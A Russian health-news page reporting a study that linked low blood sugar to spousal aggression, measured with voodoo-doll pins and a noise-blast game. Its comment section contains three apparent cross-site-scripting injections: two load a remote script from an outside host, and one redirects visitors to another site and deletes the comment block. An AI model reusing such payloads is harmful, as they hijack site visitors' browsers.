Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Постоянно ругаетесь с муж...  >>  Постоянно ругаетесь с мужем? Вы просто хотите есть!
 
Обратная связь
 

Постоянно ругаетесь с мужем? Вы просто хотите есть!

Размер шрифта
05 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Возможно, во многих семейных ссорах виновато самое обычное чувство голода – ведь, по мнению ученых, низкий уровень сахара в крови может заставить супругов злиться друг на друга и быть излишне агрессивными.

Постоянно ругаетесь с мужем? Вы просто хотите есть!

Ученые проводили эксперимент в течение трех недель. В этот период они ежедневно измеряли сахар крови у испытуемых. Оказалось, что уровень глюкозы мог «предсказать» то, насколько агрессивно супруги будут вести себя по отношению друг к другу. «Эта работа продемонстрировала один достаточно простой факт, о котором, однако, часто забывают – голод, вызванный низким уровнем глюкозы крови, может быть одной из причин супружеских споров и ссор, а возможно, в какой-то мере, даже домашнего насилия», – рассказывает Брэд Бушман, ведущий автор исследования и профессор психологии в Университете Огайо.

Самый быстрый способ повысить свой уровень глюкозы – это съесть что-нибудь сладкое. «Мы обнаружили, что чувство голода связано с повышением агрессивности и злости, так что голод в целом очень негативно влияет на наше поведение, особенно с близкими людьми», – добавляет Бушман.

В исследовании приняли участие 107 женатых пар. Ученые измеряли уровень гнева с помощью уникальной методики, разработанной Нэйтаном ДеВоллом из Университета Кентукки и подтвержденной в его более ранних работах. Каждому участнику эксперимента выдали по кукле вуду, которая была условным отображением их супруги или супруга, а также по 51 иголке. В конце каждого дня, в течение всех трех недель эксперимента, участники втыкали в куклу от 0 до 51 иголки, в зависимости от того, насколько злы они были на своего партнера. Каждый делал это в одиночестве и впоследствии записывал в дневник то количество иголок, которое он воткнул в куклу. Также у всех участников был глюкометр для измерения уровня глюкозы крови каждый день до завтрака и вечером перед сном.

В результате проведенного эксперимента ученым удалось установить, что чем ниже был вечерний уровень сахара крови, тем большее количество игл они втыкали в куклу, игравшую роль их супруга/супруги. «Если их уровень глюкозы был низок, они были гораздо более злы и вымещали свою злость на куклах», – говорит Бушман. «Причем это касается даже тех пар, у которых были очень хорошие отношения».

Но доставалось не только куклам. По прошествии 21 дня все пары пришли в лабораторию, чтобы принять участие еще в одном эксперименте. Им было сказано, что они будут конкурировать со своим партнером: кто быстрее сможет нажать кнопку, когда квадрат на экране компьютера станет красным. Победитель в каждом раунде сможет выместить злость на супруге – в наушниках проигравшего будут раздаваться громкие неприятные звуки. На самом деле они вовсе не играли против своих супругов – они играли против компьютера, который позволял им выигрывать примерно в половине раундов. При каждом таком выигрыше победитель мог решить, насколько громким будет звук в наушниках проигравшего и сколько он продлится. Во время эксперимента супруги находились в разных комнатах и не могли видеть друг друга.

Результаты показали, что те, чей средний вечерний уровень глюкозы в течение 21 дня был более низким, выбирали более громкие, долгие и неприятные звуки для своих супругов. Это было справедливо как для мужчин, так и для женщин. Причем, как оказалось, те, кто втыкал больше иголок в куклу вуду, с большей вероятностью также выбирали более неприятные и громкие звуки. «Мы обнаружили связь между агрессивными импульсами, которые мы наблюдали в опыте с куклами, и агрессивным поведением в реальных условиях», – отмечает Бушман.

Так почему же низкий уровень сахара делает людей более подверженными агрессии и гневу? Бушман объясняет это тем, что глюкоза является своеобразным топливом для нашего мозга. Самоконтроль, который подавляет агрессивные импульсы, требует затрат энергии, а эта энергия частично образуется как раз за счет глюкозы. «Несмотря на то, что мозг составляет лишь около 2% от общего веса тела, он потребляет до 20% от всей нашей энергии», – рассказывает Бушман. 

И наконец, довольно простой, но в то же время эффективный совет от ученых: прежде чем начать выяснять отношения со своим любимым, убедитесь, что вы не голодны.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:26

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вы живете с неудачником? 6 причин, почему вы не можете уйти от него   Ждать принца на белом коне – ОШИБКА!   Почему вам кажется, что начальник злой?   Принюхайтесь к соседу! Запах человека говорит о его болезнях!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Проблемы с внешностью или болезнь?
9 продуктов, которые сделают вас худой в Новом году
Еда и лекарства: когда их нельзя смешивать

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.